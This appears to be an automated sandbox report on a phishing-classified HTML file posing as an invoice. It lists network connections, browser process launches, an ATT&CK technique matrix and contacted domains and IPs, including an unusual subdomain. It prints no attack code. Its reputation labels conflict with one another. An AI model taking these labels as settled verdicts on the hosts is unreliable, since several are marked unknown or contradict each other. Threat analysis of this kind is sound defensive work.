Source: unknown	Network traffic detected: HTTP traffic on port 55112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54990
Source: unknown	Network traffic detected: HTTP traffic on port 55273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54996
Source: unknown	Network traffic detected: HTTP traffic on port 55113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55228
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55108
Source: unknown	Network traffic detected: HTTP traffic on port 55157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55102
Source: unknown	Network traffic detected: HTTP traffic on port 55134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55103
Source: unknown	Network traffic detected: HTTP traffic on port 55111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55226
Source: unknown	Network traffic detected: HTTP traffic on port 55186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55233
Source: unknown	Network traffic detected: HTTP traffic on port 55083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55118
Source: unknown	Network traffic detected: HTTP traffic on port 54984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55235
Source: unknown	Network traffic detected: HTTP traffic on port 55284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55236
Source: unknown	Network traffic detected: HTTP traffic on port 55249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55241
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55000
Source: unknown	Network traffic detected: HTTP traffic on port 55048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55240
Source: unknown	Network traffic detected: HTTP traffic on port 55168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55129
Source: unknown	Network traffic detected: HTTP traffic on port 55202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55004
Source: unknown	Network traffic detected: HTTP traffic on port 55225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55245
Source: unknown	Network traffic detected: HTTP traffic on port 54983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55134
Source: unknown	Network traffic detected: HTTP traffic on port 55007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55255
Source: unknown	Network traffic detected: HTTP traffic on port 55049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55250
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55251
Source: unknown	Network traffic detected: HTTP traffic on port 55238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55139
Source: unknown	Network traffic detected: HTTP traffic on port 55060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55256
Source: unknown	Network traffic detected: HTTP traffic on port 55261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55136
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55138
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55143
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55141
Source: unknown	Network traffic detected: HTTP traffic on port 55187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55262
Source: unknown	Network traffic detected: HTTP traffic on port 55145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55200
Source: unknown	Network traffic detected: HTTP traffic on port 55109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55209
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55205
Source: unknown	Network traffic detected: HTTP traffic on port 55061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55201
Source: unknown	Network traffic detected: HTTP traffic on port 55248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55202
Source: unknown	Network traffic detected: HTTP traffic on port 55260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55211
Source: unknown	Network traffic detected: HTTP traffic on port 55188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55216
Source: unknown	Network traffic detected: HTTP traffic on port 55226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55218
Source: unknown	Network traffic detected: HTTP traffic on port 54982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55215

Source: unknown	HTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:54974 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:54977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.2:443 -> 192.168.2.16:54978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:54979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:54980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:54983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.70.254:443 -> 192.168.2.16:55007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.113.196.254:443 -> 192.168.2.16:55037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:55040 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: invoice 700898 for wallcentre.com.shtml

Initial sample: invoice

Source: classification engine

Classification label: mal52.phis.winSHTML@74/195@50/158

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\178e847d-02f1-4a15-84df-fdf8045e1576.tmp

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\invoice 700898 for wallcentre.com.shtml
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1944,i,4061923723569728725,10462630434982569038,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1944,i,4061923723569728725,10462630434982569038,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=1968,i,7785166994045979883,11227575148762897452,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4472 --field-trial-handle=1968,i,7785166994045979883,11227575148762897452,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6756 --field-trial-handle=1968,i,7785166994045979883,11227575148762897452,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=1968,i,7785166994045979883,11227575148762897452,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4472 --field-trial-handle=1968,i,7785166994045979883,11227575148762897452,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6756 --field-trial-handle=1968,i,7785166994045979883,11227575148762897452,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	1 Extra Window Memory Injection	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Source	Detection	Scanner	Label	Link
file:///C:/Users/user/Desktop/invoice%20700898%20for%20wallcentre.com.shtml	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
teams-9999.teams-msedge.net	52.113.196.254	true	false	unknown
chrome.cloudflare-dns.com	162.159.61.3	true	false	unknown
mcr-9999.mcr-msedge.net	150.171.70.254	true	false	unknown
sb.scorecardresearch.com	18.65.39.56	true	false	unknown
www.google.com	142.250.74.196	true	false	unknown
s-part-0039.t-0009.t-msedge.net	13.107.246.67	true	false	unknown
googlehosted.l.googleusercontent.com	142.250.185.193	true	false	unknown
sni1gl.wpc.nucdn.net	152.199.21.175	true	false	unknown
clients2.googleusercontent.com	unknown	unknown	false	unknown
bzib.nelreports.net	unknown	unknown	false	unknown
assets.msn.com	unknown	unknown	false	unknown
c.msn.com	unknown	unknown	false	unknown
fbccda778f8.creategoodlife.us	unknown	unknown	false	unknown
ntp.msn.com	unknown	unknown	false	unknown
api.msn.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/invoice%20700898%20for%20wallcentre.com.shtml	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.44.201.19	unknown	United States	20940	AKAMAI-ASN1EU	false
2.23.209.149	unknown	European Union	1273	CWVodafoneGroupPLCEU	false
13.107.6.158	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.51.57.215	unknown	United States	4788	TMNET-AS-APTMNetInternetServiceProviderMY	false
23.59.250.120	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.185.227	unknown	United States	15169	GOOGLEUS	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
68.67.179.155	unknown	United States	29990	ASN-APPNEXUS	false
18.65.39.56	sb.scorecardresearch.com	United States	3	MIT-GATEWAYSUS	false
68.219.88.97	unknown	United States	6389	BELLSOUTH-NET-BLKUS	false
204.79.197.239	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
157.240.241.1	unknown	United States	32934	FACEBOOKUS	false
23.209.72.30	unknown	United States	20940	AKAMAI-ASN1EU	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.237	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.5.80	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.47.169.232	unknown	United States	16625	AKAMAI-ASUS	false
142.250.186.78	unknown	United States	15169	GOOGLEUS	false
34.104.35.123	unknown	United States	15169	GOOGLEUS	false
20.56.187.20	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
2.23.209.45	unknown	European Union	1273	CWVodafoneGroupPLCEU	false
13.107.21.237	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
74.125.133.84	unknown	United States	15169	GOOGLEUS	false
13.89.179.13	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.42.16	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
216.58.206.46	unknown	United States	15169	GOOGLEUS	false
